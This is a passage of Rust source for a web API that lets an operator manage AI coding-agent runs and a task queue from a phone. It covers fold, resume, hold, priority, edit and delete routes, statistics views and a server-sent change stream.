2561async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2562    let (id, state) = {
2563        let ui = Arc::clone(&ui);
2564        blocking(move || {
2565            let id = resolve_run(&ui.runs, &id)?;
2566            if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2567                return Err(ApiError::conflict(format!(
2568                    "run {id} is being worked on by a live daemon right now"
2569                )));
2570            }
2571            let state = read_run(&ui.runs, &id).ok();
2572            Ok((id, state))
2573        })
2574        .await?
2575    };
2576    let removed = match state {
2577        Some(mut state) => {
2578            let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2579                .await
2580                .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2581            // Nothing left to remove is not the same thing as nothing left to
2582            // do — see `clean::clear_abandoned_active`'s own doc for the run
2583            // this exists for: worktrees already gone, but a killed process
2584            // left active seats nobody will ever answer for.
2585            if removed.is_empty() {
2586                crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2587                    .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2588            }
2589            removed
2590        }
2591        None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2592            .await
2593            .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2594    };
2595    Ok(Json(FoldView {
2596        run: id,
2597        removed_count: removed.len(),
2598        removed,
2599    }))
2600}
2601
2602/// What a fold took away, so the deck can say so rather than only re-render.
2603#[derive(Debug, Serialize)]
2604struct FoldView {
2605    run: String,
2606    /// Worktree paths and branch names removed, in the order they went.
2607    removed: Vec<String>,
2608    removed_count: usize,
2609}
2610
2611/// `POST /api/runs/{id}/fold-merged` body: the pull request the operator
2612/// merged outside of `land::land`'s own loop.
2613#[derive(Debug, Deserialize)]
2614struct FoldMergedBody {
2615    #[serde(default)]
2616    pr_url: String,
2617}
2618
2619/// `POST /api/runs/{id}/fold-merged`.
2620///
2621/// The phone-reachable form of `magi fold --merged <pr-url>`: a run stuck
2622/// `Blocked` with `merge: null` because magi never got as far as opening a
2623/// pull request of its own (a title over GitHub's length limit, `gh pr
2624/// create` unreachable, a stale token), which the operator then finished by
2625/// hand on a pull request magi never recorded. The "Run actions" sheet used
2626/// to have no way to tell it about that pull request short of a terminal and
2627/// `magi fold --merged` — see `land::correct_manual_merge`'s own doc for why
2628/// this exists and what it deliberately does not do (`bump::after_merge`).
2629///
2630/// Refused, like [`run_fold`], while a live daemon is working on the run: the
2631/// correction rewrites the same `status`/`merge` fields a running graph would
2632/// be writing to on its own.
2633///
2634/// Unlike [`run_resume`] this does not return 202: it makes at most two `gh`
2635/// calls plus a fold, seconds of work, and the phone should get its answer
2636/// (which pull request it recorded, and what changed) in the same round
2637/// trip rather than learning it from the change stream.
2638async fn run_fold_merged(
2639    State(ui): State<Arc<Ui>>,
2640    Path(id): Path<String>,
2641    Json(body): Json<FoldMergedBody>,
2642) -> ApiResult<Json<FoldMergedView>> {
2643    let pr_url = body.pr_url.trim().to_owned();
2644    if pr_url.is_empty() {
2645        return Err(ApiError::bad_request("pr_url is required"));
2646    }
2647    let (id, mut state) = {
2648        let ui = Arc::clone(&ui);
2649        blocking(move || {
2650            let id = resolve_run(&ui.runs, &id)?;
2651            if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2652                return Err(ApiError::conflict(format!(
2653                    "run {id} is being worked on by a live daemon right now"
2654                )));
2655            }
2656            let state = read_run(&ui.runs, &id)?;
2657            Ok((id, state))
2658        })
2659        .await?
2660    };
2661    let (before, after) = crate::land::correct_manual_merge(&mut state, &pr_url)
2662        .await
2663        .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
2664    let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2665        .await
2666        .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2667    Ok(Json(FoldMergedView {
2668        run: id,
2669        before: before.as_str().to_owned(),
2670        after: after.as_str().to_owned(),
2671        removed,
2672    }))
2673}
2674
2675/// What [`run_fold_merged`] did, so the deck can say so.
2676#[derive(Debug, Serialize)]
2677struct FoldMergedView {
2678    run: String,
2679    /// `status` before the correction — normally `"blocked"`.
2680    before: String,
2681    /// `status` after — normally `"merged"`.
2682    after: String,
2683    /// Worktree paths and branch names the trailing fold removed.
2684    removed: Vec<String>,
2685}
2686
2687/// `POST /api/runs/{id}/resume`.
2688///
2689/// Carry a stalled run on from where it stopped, in the background.
2690///
2691/// A stalled card says "the work is kept" and used to offer no way to act on
2692/// that: the candidates are built and paid for, and continuing means re-asking
2693/// only the seats whose absence collapsed the panel. The alternative an
2694/// operator actually had was releasing the task, which competes three fresh
2695/// implementations against work that already exists.
2696///
2697/// **202, not 200.** A resume runs agents for minutes; holding the connection
2698/// is the mistake `POST /api/talks/{id}/say` already made and had fixed. The
2699/// phone learns the outcome from the change stream.
2700///
2701/// Refused when the loop is running at all, not merely when it is on this run.
2702/// The scarce resource is the agent CLIs' quota, and a tap that quietly
2703/// started a second graph on top of whatever the loop is already driving —
2704/// one run by default, or as many as `Config::daemon.max_concurrent_runs`
2705/// allows — would spend that quota twice over for no extra throughput.
2706async fn run_resume(
2707    State(ui): State<Arc<Ui>>,
2708    Path(id): Path<String>,
2709) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2710    let (id, state) = {
2711        let ui = Arc::clone(&ui);
2712        blocking(move || {
2713            let id = resolve_run(&ui.runs, &id)?;
2714            let state = read_run(&ui.runs, &id)?;
2715            Ok((id, state))
2716        })
2717        .await?
2718    };
2719    if !state.status.resumable() {
2720        return Err(ApiError::conflict(format!(
2721            "run {} is `{}`, and only a stalled or blocked run can be resumed",
2722            state.short(),
2723            status_word(state.status)
2724        )));
2725    }
2726    // Refused whenever the loop is running anything at all, not merely when
2727    // it is on this run: a manual resume racing a loop-driven run over the
2728    // same agent quota is the thing this guard exists to prevent, whether
2729    // the loop's own concurrency is one run or several.
2730    if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2731        .into_iter()
2732        .next()
2733    {
2734        return Err(ApiError::conflict(format!(
2735            "the loop is running run {} right now; stop it first, or wait for \
2736             it to finish, before resuming a run by hand.",
2737            crate::run::short_of(&work.run)
2738        )));
2739    }
2740    let _resume = ui.begin_resume(&id)?;
2741
2742    // The same shape the list route returns, so the phone updates the card it
2743    // already has rather than learning a second schema for one button.
2744    let queued = RunSummary::of(
2745        &state,
2746        !ui.questions.open_for(&id).is_empty(),
2747        state.liveness(false),
2748    );
2749    let run = id.clone();
2750    tokio::spawn(async move {
2751        let _resume = _resume;
2752        match crate::graph::Runner::resume(&run) {
2753            Ok(mut runner) => {
2754                if let Err(e) = runner.execute().await {
2755                    tracing::warn!("resume of run {run} stopped: {e:#}");
2756                }
2757            }
2758            // The run's own record is what the phone reads; this line is for
2759            // the operator's terminal.
2760            Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2761        }
2762    });
2763    Ok((StatusCode::ACCEPTED, Json(queued)))
2764}
2765
2766async fn run_report(
2767    State(ui): State<Arc<Ui>>,
2768    Path(id): Path<String>,
2769) -> ApiResult<impl IntoResponse> {
2770    let text = blocking(move || {
2771        let id = resolve_run(&ui.runs, &id)?;
2772        // Colour is off for the whole process, set once in `serve`. Rendering
2773        // is CPU work over the full state, which is the other reason this is
2774        // not on the executor.
2775        let state = read_run(&ui.runs, &id)?;
2776        let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2777        let live = state.liveness(daemon_claims);
2778        Ok(format!(
2779            "{}{}",
2780            report::run(&state),
2781            report::active_seats(&state, live)
2782        ))
2783    })
2784    .await?;
2785    Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2786}
2787
2788/// A task as the UI sees it.
2789///
2790/// The whole task, plus the two things the client would otherwise have to
2791/// reimplement: the human-readable source and the status string. Nothing is
2792/// removed - the phone shows `last_error` and the run history verbatim.
2793#[derive(Debug, Serialize)]
2794struct TaskView {
2795    #[serde(flatten)]
2796    task: Task,
2797    source_label: String,
2798    status_str: &'static str,
2799    /// The instruction, parsed as markdown, for the Queue card's "Full
2800    /// instruction" panel. `task.instruction` is unchanged and still carries
2801    /// the raw text.
2802    instruction_md: Vec<md::Node>,
2803    /// For a blocked task, what it waits on with each dependency's state, e.g.
2804    /// `4135 (blocked → 9db7 held)`. Built server-side so the client never
2805    /// recurses; empty for every other status.
2806    waits_on: Vec<String>,
2807    /// Short ids of the held (or cyclic) tasks a blocked task is frozen
2808    /// behind - non-empty means nothing in the loop will ever run it.
2809    stuck_roots: Vec<String>,
2810}
2811
2812impl From<Task> for TaskView {
2813    fn from(task: Task) -> Self {
2814        Self {
2815            source_label: task.source.label(),
2816            status_str: task.status.as_str(),
2817            instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2818            waits_on: Vec::new(),
2819            stuck_roots: Vec::new(),
2820            task,
2821        }
2822    }
2823}
2824
2825impl TaskView {
2826    fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2827        let waits_on = inv.waits_on(&task);
2828        let stuck_roots = inv
2829            .stuck_roots(&task)
2830            .iter()
2831            .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2832            .collect();
2833        Self {
2834            waits_on,
2835            stuck_roots,
2836            ..Self::from(task)
2837        }
2838    }
2839}
2840
2841/// `?refresh=1` forces a re-scan even inside the TTL. Any other value, or
2842/// its absence, leaves the cache to decide.
2843#[derive(Debug, Default, Deserialize)]
2844#[serde(default)]
2845struct ReposQuery {
2846    refresh: u8,
2847}
2848
2849/// `GET /api/repos` - local checkouts found under `[repos] roots`, the same
2850/// listing `magi repos` prints at a terminal.
2851///
2852/// Reads `[repos] roots` and `[repos] scan_ttl` discovered against `ui.repo`
2853/// so an edit to `magi.toml` takes effect without a restart, the same
2854/// reasoning [`config_for`] documents for the talk routes.
2855async fn repos_list(
2856    State(ui): State<Arc<Ui>>,
2857    Query(q): Query<ReposQuery>,
2858) -> ApiResult<Json<Vec<repos::Repo>>> {
2859    let refresh = q.refresh != 0;
2860    blocking(move || {
2861        let (cfg, _) = Config::discover(&ui.repo, None)?;
2862        Ok(Json(ui.repos_cache.list(
2863            &cfg.repos.roots,
2864            Duration::from_secs(cfg.repos.scan_ttl),
2865            refresh,
2866        )))
2867    })
2868    .await
2869}
2870
2871async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2872    blocking(move || {
2873        let tasks = ui.queue.list();
2874        let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2875        Ok(Json(
2876            tasks
2877                .into_iter()
2878                .map(|t| TaskView::with_inventory(t, &inv))
2879                .collect(),
2880        ))
2881    })
2882    .await
2883}
2884
2885/// A rate together with its denominator, so the client can tell "computed as
2886/// 0%" apart from "no data to compute it from" — both would otherwise
2887/// serialize as `0.0`. `None` means the denominator was zero.
2888#[derive(Debug, Serialize)]
2889struct RateView {
2890    pct: f64,
2891    denominator: usize,
2892}
2893
2894impl RateView {
2895    fn of(numerator: usize, denominator: usize) -> Option<Self> {
2896        (denominator > 0).then(|| Self {
2897            pct: 100.0 * numerator as f64 / denominator as f64,
2898            denominator,
2899        })
2900    }
2901}
2902
2903/// [`crate::stats::Totals`] for the wire: the raw counters plus the derived
2904/// rates, each paired with its own denominator via [`RateView`] rather than
2905/// exposing `Stats`' own percentage methods directly — see this module's
2906/// doc for why `Stats` itself is never serialized.
2907#[derive(Debug, Serialize)]
2908struct StatsTotalsView {
2909    runs: usize,
2910    merged: usize,
2911    ready: usize,
2912    blocked: usize,
2913    failed: usize,
2914    stalled: usize,
2915    verified_noop: usize,
2916    superseded: usize,
2917    in_progress: usize,
2918    completion_rate: Option<RateView>,
2919    tallied: usize,
2920    split: usize,
2921    split_rate: Option<RateView>,
2922    deliberated: usize,
2923    minds_changed: usize,
2924    converged: usize,
2925    review_rounds: usize,
2926}
2927
2928impl From<&stats::Totals> for StatsTotalsView {
2929    fn from(t: &stats::Totals) -> Self {
2930        Self {
2931            runs: t.runs,
2932            merged: t.merged,
2933            ready: t.ready,
2934            blocked: t.blocked,
2935            failed: t.failed,
2936            stalled: t.stalled,
2937            verified_noop: t.verified_noop,
2938            superseded: t.superseded,
2939            in_progress: t.in_progress,
2940            completion_rate: RateView::of(t.merged + t.ready, t.runs),
2941            tallied: t.tallied,
2942            split: t.split,
2943            split_rate: RateView::of(t.split, t.tallied),
2944            deliberated: t.deliberated,
2945            minds_changed: t.minds_changed,
2946            converged: t.converged,
2947            review_rounds: t.review_rounds,
2948        }
2949    }
2950}
2951
2952/// [`crate::stats::AgentStats`] for the wire.
2953#[derive(Debug, Serialize)]
2954struct AgentStatsView {
2955    agent: String,
2956    entered: usize,
2957    wins: usize,
2958    empty: usize,
2959    win_rate: Option<RateView>,
2960}
2961
2962impl From<&stats::AgentStats> for AgentStatsView {
2963    fn from(a: &stats::AgentStats) -> Self {
2964        Self {
2965            agent: a.agent.clone(),
2966            entered: a.entered,
2967            wins: a.wins,
2968            empty: a.empty,
2969            win_rate: RateView::of(a.wins, a.entered),
2970        }
2971    }
2972}
2973
2974/// [`crate::stats::ReviewerStats`] for the wire. `adopted_per_round` is a
2975/// ratio, not a percentage, so it carries no [`RateView`] — just the raw
2976/// value, `None` when `rounds` is zero.
2977#[derive(Debug, Serialize)]
2978struct ReviewerStatsView {
2979    agent: String,
2980    rounds: usize,
2981    seated: usize,
2982    submitted: usize,
2983    adopted: usize,
2984    unique: usize,
2985    timeouts: usize,
2986    adopted_per_round: Option<f64>,
2987    precision: Option<RateView>,
2988    unique_rate: Option<RateView>,
2989    timeout_rate: Option<RateView>,
2990}
2991
2992impl From<&stats::ReviewerStats> for ReviewerStatsView {
2993    fn from(r: &stats::ReviewerStats) -> Self {
2994        Self {
2995            agent: r.agent.clone(),
2996            rounds: r.rounds,
2997            seated: r.seated,
2998            submitted: r.submitted,
2999            adopted: r.adopted,
3000            unique: r.unique,
3001            timeouts: r.timeouts,
3002            adopted_per_round: (r.rounds > 0).then(|| r.adopted_per_round()),
3003            precision: RateView::of(r.adopted, r.submitted),
3004            unique_rate: RateView::of(r.unique, r.submitted),
3005            timeout_rate: RateView::of(r.timeouts, r.seated),
3006        }
3007    }
3008}
3009
3010/// [`crate::stats::AdvisorStats`] for the wire.
3011///
3012/// `reflection_rate` is approximate by construction — see
3013/// [`crate::stats::AdvisorStats`]'s own doc — and the UI note that carries
3014/// that caveat is static text in `index.html`, not a field here.
3015#[derive(Debug, Serialize)]
3016struct AdvisorStatsView {
3017    agent: String,
3018    seated: usize,
3019    proposed: usize,
3020    absent: usize,
3021    faint: usize,
3022    strong: usize,
3023    reflection_rate: Option<RateView>,
3024}
3025
3026impl From<&stats::AdvisorStats> for AdvisorStatsView {
3027    fn from(a: &stats::AdvisorStats) -> Self {
3028        Self {
3029            agent: a.agent.clone(),
3030            seated: a.seated,
3031            proposed: a.proposed,
3032            absent: a.absent,
3033            faint: a.faint,
3034            strong: a.strong,
3035            reflection_rate: RateView::of(a.strong, a.proposed),
3036        }
3037    }
3038}
3039
3040/// [`crate::stats::E2eStats`] for the wire.
3041#[derive(Debug, Serialize)]
3042struct E2eStatsView {
3043    rounds: usize,
3044    failures: usize,
3045    sole_detections: usize,
3046    deferred: usize,
3047    sole_rate: Option<RateView>,
3048}
3049
3050impl From<&stats::E2eStats> for E2eStatsView {
3051    fn from(e: &stats::E2eStats) -> Self {
3052        Self {
3053            rounds: e.rounds,
3054            failures: e.failures,
3055            sole_detections: e.sole_detections,
3056            deferred: e.deferred,
3057            sole_rate: RateView::of(e.sole_detections, e.failures),
3058        }
3059    }
3060}
3061
3062/// [`crate::stats::ReleaseBumpStats`] for the wire.
3063///
3064/// `clean` is sent as a raw count, computed the same way
3065/// [`stats::ReleaseBumpStats::clean`] computes it (`recorded -
3066/// needs_attention`) — never derived client-side from `automerge_enabled`,
3067/// which would misclassify a `merged_directly` bump (automerge rejected, but
3068/// magi merged it directly, so no human involvement) as needing attention.
3069#[derive(Debug, Serialize)]
3070struct ReleaseBumpStatsView {
3071    merged: usize,
3072    recorded: usize,
3073    pr_opened: usize,
3074    automerge_enabled: usize,
3075    merged_directly: usize,
3076    needs_attention: usize,
3077    clean: usize,
3078    coverage_rate: Option<RateView>,
3079    automerge_rate: Option<RateView>,
3080    attention_rate: Option<RateView>,
3081}
3082
3083impl From<&stats::ReleaseBumpStats> for ReleaseBumpStatsView {
3084    fn from(b: &stats::ReleaseBumpStats) -> Self {
3085        Self {
3086            merged: b.merged,
3087            recorded: b.recorded,
3088            pr_opened: b.pr_opened,
3089            automerge_enabled: b.automerge_enabled,
3090            merged_directly: b.merged_directly,
3091            needs_attention: b.needs_attention,
3092            clean: b.clean(),
3093            coverage_rate: RateView::of(b.recorded, b.merged),
3094            automerge_rate: RateView::of(b.automerge_enabled, b.pr_opened),
3095            attention_rate: RateView::of(b.needs_attention, b.recorded),
3096        }
3097    }
3098}
3099
3100/// [`crate::queue::TaskCounts`] for the wire.
3101#[derive(Debug, Serialize)]
3102struct TaskCountsView {
3103    queued: usize,
3104    running: usize,
3105    done: usize,
3106    failed: usize,
3107    held: usize,
3108    blocked: usize,
3109}
3110
3111impl From<crate::queue::TaskCounts> for TaskCountsView {
3112    fn from(c: crate::queue::TaskCounts) -> Self {
3113        Self {
3114            queued: c.queued,
3115            running: c.running,
3116            done: c.done,
3117            failed: c.failed,
3118            held: c.held,
3119            blocked: c.blocked,
3120        }
3121    }
3122}
3123
3124/// `GET /api/stats` - the whole answer. `Stats` itself carries no
3125/// `Serialize`, deliberately: its fields (and the CLI text `report::stats`
3126/// renders from them) are free to grow without that becoming a wire-contract
3127/// change, and its zero-denominator rate methods (`0.0`) cannot tell "no
3128/// data" from "computed and it really is zero" the way [`RateView`] does.
3129#[derive(Debug, Serialize)]
3130struct StatsView {
3131    totals: StatsTotalsView,
3132    /// Best win rate first, as [`stats::collect`] already sorts it.
3133    agents: Vec<AgentStatsView>,
3134    /// Most adopted-per-round first, as [`stats::collect`] already sorts it.
3135    reviewers: Vec<ReviewerStatsView>,
3136    /// Highest reflection rate first, as [`stats::collect`] already sorts it.
3137    advisors: Vec<AdvisorStatsView>,
3138    e2e: E2eStatsView,
3139    release_bumps: ReleaseBumpStatsView,
3140    queue: TaskCountsView,
3141    /// Same count and same meaning as [`HealthView::runs_unreadable`] - see
3142    /// that field's doc. Asserted to match it in
3143    /// `stats_runs_unreadable_matches_health`.
3144    runs_unreadable: usize,
3145}
3146
3147/// `GET /api/stats` - task and run statistics for the dashboard, aggregated
3148/// by [`stats::collect`], the same function `magi stats` prints from. Reads
3149/// every readable run on disk, exactly as [`runs_unreadable`] does, so the
3150/// two counts can never drift apart the way a separately-maintained tally
3151/// could.
3152async fn stats_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<StatsView>> {
3153    blocking(move || {
3154        let states: Vec<RunState> = run_ids(&ui.runs)
3155            .into_iter()
3156            .filter_map(|id| read_run(&ui.runs, &id).ok())
3157            .collect();
3158        let collected = stats::collect(&states);
3159        let queue_counts = crate::queue::TaskCounts::of(&ui.queue.list());
3160        Ok(Json(StatsView {
3161            totals: StatsTotalsView::from(&collected.totals),
3162            agents: collected.agents.iter().map(AgentStatsView::from).collect(),
3163            reviewers: collected
3164                .reviewers
3165                .iter()
3166                .map(ReviewerStatsView::from)
3167                .collect(),
3168            advisors: collected
3169                .advisors
3170                .iter()
3171                .map(AdvisorStatsView::from)
3172                .collect(),
3173            e2e: E2eStatsView::from(&collected.e2e),
3174            release_bumps: ReleaseBumpStatsView::from(&collected.release_bumps),
3175            queue: TaskCountsView::from(queue_counts),
3176            runs_unreadable: runs_unreadable(&ui.runs),
3177        }))
3178    })
3179    .await
3180}
3181
3182/// The body of `POST /api/queue/{id}/hold`, sent empty when the operator
3183/// gives no reason - which must keep working, since not every hold has one.
3184#[derive(Debug, Default, Deserialize)]
3185#[serde(default, deny_unknown_fields)]
3186struct HoldBody {
3187    reason: Option<String>,
3188}
3189
3190async fn queue_hold(
3191    State(ui): State<Arc<Ui>>,
3192    Path(id): Path<String>,
3193    body: std::result::Result<Json<HoldBody>, JsonRejection>,
3194) -> ApiResult<Json<TaskView>> {
3195    // An absent body is the ordinary case - most holds are unexplained, and
3196    // that has to stay a one-tap action rather than a form. A body that is
3197    // present and malformed is still a bad request.
3198    let body = match body {
3199        Ok(Json(body)) => body,
3200        Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
3201        Err(e) => return Err(ApiError::bad_request(e.body_text())),
3202    };
3203    let reason = body.reason.filter(|r| !r.trim().is_empty());
3204    mutate(ui, id, move |t| {
3205        t.hold_manual(reason.clone());
3206        Ok(())
3207    })
3208    .await
3209}
3210
3211async fn queue_release(
3212    State(ui): State<Arc<Ui>>,
3213    Path(id): Path<String>,
3214) -> ApiResult<Json<TaskView>> {
3215    mutate(ui, id, |t| {
3216        t.release();
3217        Ok(())
3218    })
3219    .await
3220}
3221
3222/// The body of `POST /api/queue/{id}/priority`.
3223#[derive(Debug, Deserialize)]
3224#[serde(deny_unknown_fields)]
3225struct PriorityBody {
3226    priority: i32,
3227}
3228
3229/// `POST /api/queue/{id}/priority` - the up/down control on the Queue card.
3230///
3231/// [`Task::set_priority`] is the one place the "not while running" rule is
3232/// stated; this route only carries the body to it and lets its `Err` become
3233/// the 4xx the card shows.
3234async fn queue_priority(
3235    State(ui): State<Arc<Ui>>,
3236    Path(id): Path<String>,
3237    body: std::result::Result<Json<PriorityBody>, JsonRejection>,
3238) -> ApiResult<Json<TaskView>> {
3239    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3240    mutate(ui, id, move |t| t.set_priority(body.priority)).await
3241}
3242
3243/// The body of `POST /api/queue/{id}/edit`.
3244#[derive(Debug, Deserialize)]
3245#[serde(deny_unknown_fields)]
3246struct EditBody {
3247    title: String,
3248    instruction: String,
3249}
3250
3251/// `POST /api/queue/{id}/edit` - the full-text replacement the phone's edit
3252/// sheet sends. [`Task::edit`] refuses anything but `queued` and `held`, and
3253/// that refusal's message is what the sheet shows back.
3254async fn queue_edit(
3255    State(ui): State<Arc<Ui>>,
3256    Path(id): Path<String>,
3257    body: std::result::Result<Json<EditBody>, JsonRejection>,
3258) -> ApiResult<Json<TaskView>> {
3259    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3260    mutate(ui, id, move |t| {
3261        t.edit(body.title.clone(), body.instruction.clone())
3262    })
3263    .await
3264}
3265
3266/// `POST /api/queue/{id}/done` - close a task as finished without deleting
3267/// it, so the phone's other way to clear a task from the backlog does not
3268/// have to cost the run history, the attribution, and `created_at` the way
3269/// [`queue_delete`] does. Behaves exactly like `magi task done`: any status
3270/// can be marked done by hand, because this is for the run the loop never
3271/// saw land - a merge done by hand, or a gate that misreported - and that can
3272/// happen from any status the task was left in.
3273async fn queue_done(
3274    State(ui): State<Arc<Ui>>,
3275    Path(id): Path<String>,
3276) -> ApiResult<Json<TaskView>> {
3277    let home = ui.home.clone();
3278    mutate(ui, id, move |t| {
3279        t.succeed();
3280        // Same as the loop's own settle path: closing a task by hand is just
3281        // as much "this task's story is over" as a daemon-driven `Merged`/
3282        // `Ready` is, so any earlier `Blocked`/`Stalled` attempt it leaves
3283        // behind must stop looking like it still needs a human. `ui.home`,
3284        // not the process-global `run::home()`: they agree in a real
3285        // process, but only `ui.home` also agrees with a test fixture's own
3286        // directory.
3287        crate::daemon::supersede_prior_runs(t, &home);
3288        Ok(())
3289    })
3290    .await
3291}
3292
3293/// `DELETE /api/queue/{id}`.
3294///
3295/// Remove a task from the backlog. Refused only while a live daemon's heartbeat
3296/// names this task: a `running` status or an orphaned `.lock` left behind by a
3297/// killed daemon is a leftover, and treating either as authority made the
3298/// task undeletable from the phone for good. The associated runs, if any, are
3299/// kept: a run is self-contained history and not an appendage of the task.
3300async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
3301    blocking(move || {
3302        let id = resolve_task(&ui.queue, &id)?;
3303        let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
3304        ui.queue
3305            .remove(&id, in_flight, &ui.questions)
3306            .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
3307        Ok(StatusCode::NO_CONTENT)
3308    })
3309    .await
3310}
3311
3312/// Read a task, change it, write it back, under the queue's own lock.
3313///
3314/// Taking the same claim a daemon takes is what makes hold, release,
3315/// priority, edit, and done safe to press while magi is running: without it
3316/// the daemon's next save would land on top of the operator's change and
3317/// undo it. `change` can refuse - [`Task::set_priority`] and [`Task::edit`]
3318/// both do, for a running task - and that refusal becomes the 4xx the card
3319/// shows, same as any other domain rule.
3320async fn mutate(
3321    ui: Arc<Ui>,
3322    id: String,
3323    change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
3324) -> ApiResult<Json<TaskView>> {
3325    blocking(move || {
3326        let id = resolve_task(&ui.queue, &id)?;
3327        // `claim` fails when the lock file already exists, which is the
3328        // conflict the UI must report: the daemon owns that task's file for
3329        // as long as it is running it, and our write would be lost under its
3330        // next save. The message names the lock either way.
3331        let _claim = ui.queue.claim(&id).map_err(|e| {
3332            ApiError::conflict(format!(
3333                "{e:#} - a daemon is running this task, so it cannot be \
3334                 changed from here yet"
3335            ))
3336        })?;
3337        let mut task = ui.queue.get(&id)?;
3338        change(&mut task).map_err(ApiError::bad_request_from)?;
3339        ui.queue.put(&mut task)?;
3340        Ok(Json(TaskView::from(task)))
3341    })
3342    .await
3343}
3344
3345/// The change stream: one revision number per store, on connect and whenever
3346/// any of them moves.
3347///
3348/// The poll runs in one spawned task per client, which is affordable because
3349/// the work is a directory scan and a `stat` per file. It stops as soon as the
3350/// receiver is gone, so a phone that walks out of range costs nothing after
3351/// its next tick - there is no session and no cleanup to forget.
3352async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
3353    let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
3354    tokio::spawn(async move {
3355        let mut ticker = tokio::time::interval(POLL);
3356        let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
3357        loop {
3358            // The first tick completes immediately, which is what makes the
3359            // stream announce the current revisions on connect.
3360            ticker.tick().await;
3361            let state = Arc::clone(&ui);
3362            let revisions = tokio::task::spawn_blocking(move || {
3363                (
3364                    state.queue.revision(),
3365                    runs_revision(&state.runs),
3366                    state.questions.revision(),
3367                    state.talks.revision(),
3368                    state.notices.revision(),
3369                    // The loop's counter is in-process state rather than a
3370                    // file, so nothing the three stats above look at would
3371                    // tell this phone that another one started the loop.
3372                    state.lock_loop().rev,
3373                )
3374            })
3375            .await;
3376            let Ok(revisions) = revisions else { break };
3377            if last == Some(revisions) {
3378                continue;
3379            }
3380            last = Some(revisions);
3381            let payload = serde_json::json!({
3382                "queue_rev": revisions.0,
3383                "runs_rev": revisions.1,
3384                "questions_rev": revisions.2,
3385                "talks_rev": revisions.3,
3386                "notifications_rev": revisions.4,
3387                "loop_rev": revisions.5,
3388            });
3389            // Serializing five integers cannot fail; giving up beats looping.
3390            let Ok(event) = Event::default().event("change").json_data(payload) else {
3391                break;
3392            };
3393            if tx.send(event).await.is_err() {
3394                break;
3395            }
3396        }
3397    });
3398    Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
3399        .keep_alive(KeepAlive::new().interval(KEEPALIVE))
3400}
3401
3402/// Change detection token for recorded runs under `runs`.
3403///
3404/// Combines the id and `run.json` modification time of each run, so adding,
3405/// updating, or deleting any run — even an older one — moves the revision and
3406/// notifies connected clients via the change stream. Returns 0 when no runs
3407/// exist.
3408fn runs_revision(runs: &FsPath) -> u64 {
3409    use std::hash::{Hash as _, Hasher as _};
3410
3411    let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
3412        .into_iter()
3413        .flatten()
3414        .flatten()
3415        .filter_map(|e| {
3416            let path = e.path().join("run.json");
3417            let mtime = path
3418                .metadata()
3419                .ok()?
3420                .modified()
3421                .ok()?
3422                .duration_since(std::time::UNIX_EPOCH)
3423                .ok()?
3424                .as_millis() as u64;
3425            let id = e.file_name().to_string_lossy().into_owned();
3426            Some((id, mtime))
3427        })
3428        .collect();
3429
3430    if entries.is_empty() {
3431        return 0;
3432    }
3433
3434    entries.sort_unstable();
3435    let mut hasher = std::hash::DefaultHasher::new();
3436    for (id, mtime) in &entries {
3437        id.hash(&mut hasher);
3438        mtime.hash(&mut hasher);
3439    }
3440    let h = hasher.finish();
3441    if h == 0 { 1 } else { h }
3442}
3443
3444/// Run ids under `runs`, newest first.
3445///
3446/// Rooted at an explicit directory rather than calling [`run::list_ids`],
3447/// which reads the process-global home: the server has to be drivable against
3448/// a temp directory for any of this to be testable.
3449fn run_ids(runs: &FsPath) -> Vec<String> {
3450    let mut ids: Vec<String> = std::fs::read_dir(runs)
3451        .into_iter()
3452        .flatten()
3453        .flatten()
3454        .filter(|e| e.path().join("run.json").is_file())
3455        .map(|e| e.file_name().to_string_lossy().into_owned())
3456        .collect();
3457    // Ids start with a sortable timestamp.
3458    ids.sort_unstable_by(|a, b| b.cmp(a));
3459    ids
3460}
3461
3462/// Read one run's state from an explicit runs root.
3463fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3464    let path = runs.join(id).join("run.json");
3465    let body =
3466        std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3467    let state: RunState =
3468        serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3469    if state.schema != run::SCHEMA {
3470        anyhow::bail!(
3471            "run {} was written by a different magi (schema {}, this build speaks {})",
3472            state.id,
3473            state.schema,
3474            run::SCHEMA
3475        );
3476    }
